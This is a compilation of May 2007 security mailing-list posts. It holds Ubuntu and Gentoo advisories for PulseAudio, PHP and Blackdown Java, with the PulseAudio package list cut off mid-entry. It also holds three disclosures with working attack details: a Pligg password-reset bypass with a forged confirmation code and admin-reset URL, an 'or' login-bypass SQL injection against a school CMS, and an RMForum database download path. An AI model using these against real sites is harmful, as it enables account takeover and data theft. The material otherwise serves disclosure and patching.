[USN-465-1] PulseAudio vulnerability
=== Ubuntu Security Notice USN-465-1 May 25, 2007 pulseaudio vulnerability CVE-2007-1804 === A security issue affects the following Ubuntu releases: Ubuntu 7.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 7.04: pulseaudio 0.9.5-5ubuntu4.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Luigi Auriemma discovered multiple flaws in pulseaudio's network processing code. If an unauthenticated attacker sent specially crafted requests to the pulseaudio daemon, it would crash, resulting in a denial of service. Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5-5ubuntu4.1.diff.gz Size/MD5:16615 9d9b53272d9252e4927f0e51300f4fce http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5-5ubuntu4.1.dsc Size/MD5: 1265 1474ef70032d18fe70b09047637bb2ac http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5.orig.tar.gz Size/MD5: 1145930 99b5d9efd4fce35cabb4ae5d0ebb230d amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-browse0_0.9.5-5ubuntu4.1_amd64.deb Size/MD5:11358 3f38fa55e3e2ec7b8476772c8046b100 http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-dev_0.9.5-5ubuntu4.1_amd64.deb Size/MD5: 181014 24bb58434084ba059fe03afee7e7c31a http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.5-5ubuntu4.1_amd64.deb Size/MD5:11434 7182d91212fe96fe269635f1619098c3 http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse0_0.9.5-5ubuntu4.1_amd64.deb Size/MD5: 111078 16a55c91c20d58271a2ad0f77111874d http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio-esound-compat_0.9.5-5ubuntu4.1_amd64.deb Size/MD5:27326 aafca78e8a359714d9261806ba0c883e http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-gconf_0.9.5-5ubuntu4.1_amd64.deb Size/MD5:12706 7d73bbce987c1f8792e96e67cd865983 http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-hal_0.9.5-5ubuntu4.1_amd64.deb Size/MD5:14738 656c160743b689e8c876180b19d85700 http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-lirc_0.9.5-5ubuntu4.1_amd64.deb Size/MD5: 9102 aab1e8dc340901fc2ae6c648c56910e3 http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-x11_0.9.5-5ubuntu4.1_amd64.deb Size/MD5:15980 40d971c18451d46380b9880ac1db09e6 http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-zeroconf_0.9.5-5ubuntu4.1_amd64.deb Size/MD5:14446 87e590ceb4e0f241875eab95e42a7efa http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-utils_0.9.5-5ubuntu4.1_amd64.deb Size/MD5:52658 038c6d8dcad7aefc338f565349dcc7bd http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5-5ubuntu4.1_amd64.deb Size/MD5: 331022 19c1f526d3c61cdee453fb3527405983 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-browse0_0.9.5-5ubuntu4.1_i386.deb Size/MD5:10692 9d8d4fd14f7659455357d9aed48f82a4 http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-dev_0.9.5-5ubuntu4.1_i386.deb Size/MD5: 159072 be0f064914c83a102f1979a67063fb07 http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.5-5ubuntu4.1_i386.deb Size/MD5:10862 a2aff8660f4e212552a11ee24bc67676 http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse0_0.9.5-5ubuntu4.1_i386.deb Size/MD5: 100038 5705deb6ebb7e61e74cad9a6e812e22d http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio-esound-compat_0.9.5-5ubuntu4.1_i386.deb Size/MD5:25520 4f7907dd870e564bec851003009baa88 http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-gconf_0.9.5-5ubuntu4.1_i386.deb Size/MD5:12084 10f2fe882feed2906037e0cfef22a601 http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-hal_0.9.5-5ubuntu4.1_i386.deb Size/MD5:13602 9578081e9c654ebb4f320a10a63d56fc http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-lirc_0.9.5-5ubuntu4.1_i386.deb Size/MD5: 8820 66e9b2747e87d22e7ec1b6d4b62ee845 http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-x11_0.9.5-5ubuntu4.1_i386.deb Size/MD5:14790
Zindizayn Okul Web Sistemi v1.0 Sql VulnZ.
# Script's Name : Zindizayn Okul Web Sistemi v1.0 (tr) # Script's MainPage : http://www.okulwebsistemi.com # Risk : Medium # Found By : ShaFuck31 # Thanks : | The RéD | DesquneR | SaboTaqe | [EMAIL PROTECTED] | BLaSTER | # Vulnerable file : mezungiris.asp ogretmenkontrol.asp #Vuln : http://www.victim.com/ScriptPath/mezungiris.asp http://www.victim.com/ScriptPath/ogretmenkontrol.asp *** You Can Use 'or' For id pass ;) #Contact: g0rk3m-31 (at) HoTMaiL (dot) CoM [not add me ;)] # I Cry When The Angels Will Deserve To Die ...
Re: Pligg critical vulnerability
have you notified to the pligg developers?i think they have well
defined policy for discloser?
On 5/25/07, 242th section [EMAIL PROTECTED] wrote:
Pligg critical vulnerability
Concerned version : 9.5 and ?
Description :
Pligg is a flexible CMS based on PHP and MYSQL.
To reinitialize a forgotten password, Pligg follows a classical
process. A confirmation code is generated and sent by email to the
concerned user mail box. The user has to follow the link containing
the confirmation code and if the confirmation code is checked
successfully, the password is reinitialized to a pre-defined value.
you can find a part of the source code in charge of this check below :
WEB_ROOT/libs/html1.php
[…]
function generateHash($plainText, $salt = null){
if ($salt === null) {
$salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH); }
else {
$salt = substr($salt, 0, SALT_LENGTH);
}
return $salt . sha1($salt . $plainText);
}
[…]
WEB_ROOT/login.php :
[…]
$confirmationcode = $_GET[confirmationcode];
if(generateHash($username, substr($confirmationcode, 0, SALT_LENGTH))
== $confirmationcode){
$db-query('UPDATE `' . table_users . '` SET `user_pass` =
033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750 WHERE `user_login`
= '.$username.'');
[…]
Unfortunately, as you can read, you can easily generate, for a given
username, a confirmation code that passes successfully the following
check if(generateHash($username, substr($confirmationcode, 0,
SALT_LENGTH)) == $confirmationcode)
Example :
Let's choose :
salt = 123456789
and,
username = admin
we have :
sha1(123456789admin) = 1e2f566cbda0a9c855240bf21b8bae030404cad7
and thus :
confirmationcode = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
with the following url you can reinitialize the user admin password :
http://www.domain.com/login.php?processlogin=4username=adminconfirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
242th.section.
--
---
http://www.secgeeks.com
get a blog on SecGeeks :)
register here:-
http://secgeeks.com/user/register
rss feeds :-
http://secradar.com/node/feed
http://www.newskicks.com
Submit and kick for new stories from all around the world.
---
[ GLSA 200705-19 ] PHP: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200705-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: PHP: Multiple vulnerabilities Date: May 26, 2007 Bugs: #169372 ID: 200705-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis PHP contains several vulnerabilities including buffer and integer overflows which could under certain conditions lead to the remote execution of arbitrary code. Background == PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-lang/php5.2.2 *= 4.4.7 = 5.2.2 Description === Several vulnerabilities were found in PHP, most of them during the Month Of PHP Bugs (MOPB) by Stefan Esser. The most severe of these vulnerabilities are integer overflows in wbmp.c from the GD library (CVE-2007-1001) and in the substr_compare() PHP 5 function (CVE-2007-1375). Ilia Alshanetsky also reported a buffer overflow in the make_http_soap_request() and in the user_filter_factory_create() functions (CVE-2007-2510, CVE-2007-2511), and Stanislav Malyshev discovered another buffer overflow in the bundled XMLRPC library (CVE-2007-1864). Additionally, the session_regenerate_id() and the array_user_key_compare() functions contain a double-free vulnerability (CVE-2007-1484, CVE-2007-1521). Finally, there exist implementation errors in the Zend engine, in the mb_parse_str(), the unserialize() and the mail() functions and other elements. Impact == Remote attackers might be able to exploit these issues in PHP applications making use of the affected functions, potentially resulting in the execution of arbitrary code, Denial of Service, execution of scripted contents in the context of the affected site, security bypass or information leak. Workaround == There is no known workaround at this time. Resolution == All PHP 5 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-lang/php-5.2.2 All PHP 4 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-lang/php-4.4.7 References == [ 1 ] CVE-2007-1001 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1001 [ 2 ] CVE-2007-1285 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1285 [ 3 ] CVE-2007-1286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1286 [ 4 ] CVE-2007-1484 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1484 [ 5 ] CVE-2007-1521 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1521 [ 6 ] CVE-2007-1583 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1583 [ 7 ] CVE-2007-1700 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1700 [ 8 ] CVE-2007-1701 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1701 [ 9 ] CVE-2007-1711 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1711 [ 10 ] CVE-2007-1717 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1717 [ 11 ] CVE-2007-1718 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1718 [ 12 ] CVE-2007-1864 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1864 [ 13 ] CVE-2007-1900 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1900 [ 14 ] CVE-2007-2509 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2509 [ 15 ] CVE-2007-2510 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2510 [ 16 ] CVE-2007-2511 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2511 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200705-19.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
RMForum Database Disclosure Vulnerabilitiy
:: ::: :: :: :: : :: :: :: : : :: :: ::: ::: :: :: :: :::: :: :: :: : : : :: :: Xmor$ Security Vulnerability Research TM # Tilte: RMForum Database Disclosure Vulnerabilitiy # Author..: [the_Edit0r] # Location ...: [Iran] # Homepage ...: [Www.XmorS-sEcurity.coM] [Www.XmorS.coM] [Www.XmorS.neT] # Software ...: [RMForum] # Advisory ...: [Www.XmorS-sEurity.coM/advisory/webCMS_1.00.txt] # Site Script : [http://sourceforge.net/projects/rm-forum/] ---proof Of Concept-- www.example.com/[path]/rmforum.mdb -- # Contact me : the_3dit0r[at]Yahoo[dot]coM # [XmorS-SEcurity.coM]
[ GLSA 200705-20 ] Blackdown Java: Applet privilege escalation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200705-20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Blackdown Java: Applet privilege escalation Date: May 26, 2007 Bugs: #161835 ID: 200705-20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis The Blackdown JDK and the Blackdown JRE suffer from the multiple unspecified vulnerabilities that already affected the Sun JDK and JRE. Background == Blackdown provides implementations of the Java Development Kit (JDK) and the Java Runtime Environment (JRE). Affected packages = --- Package /Vulnerable/ Unaffected --- 1 dev-java/blackdown-jdk 1.4.2.03-r14 = 1.4.2.03-r14 2 dev-java/blackdown-jre 1.4.2.03-r14 = 1.4.2.03-r14 --- 2 affected packages on all of their supported architectures. --- Description === Chris Evans has discovered multiple buffer overflows in the Sun JDK and the Sun JRE possibly related to various AWT and font layout functions. Tom Hawtin has discovered an unspecified vulnerability in the Sun JDK and the Sun JRE relating to unintended applet data access. He has also discovered multiple other unspecified vulnerabilities in the Sun JDK and the Sun JRE allowing unintended Java applet or application resource acquisition. Additionally, a memory corruption error has been found in the handling of GIF images with zero width field blocks. Impact == An attacker could entice a user to run a specially crafted Java applet or application that could read, write, or execute local files with the privileges of the user running the JVM, access data maintained in other Java applets, or escalate the privileges of the currently running Java applet or application allowing for unauthorized access to system resources. Workaround == Disable the nsplugin USE flag in order to prevent web applets from being run. Resolution == Since there is no fixed update from Blackdown and since the flaw only occurs in the applets, the nsplugin USE flag has been masked in the portage tree. Emerge the ebuild again in order to fix the vulnerability. Another solution is to switch to another Java implementation such as the Sun implementation (dev-java/sun-jdk and dev-java/sun-jre-bin). # emerge --sync # emerge --ask --oneshot --verbose dev-java/blackdown-jdk # emerge --ask --oneshot --verbose dev-java/blackdown-jre References == [ 1 ] CVE-2006-6731 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6731 [ 2 ] CVE-2006-6736 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6736 [ 3 ] CVE-2006-6737 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6737 [ 4 ] CVE-2006-6745 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6745 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200705-20.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpPHDb2kTZ2q.pgp Description: PGP signature
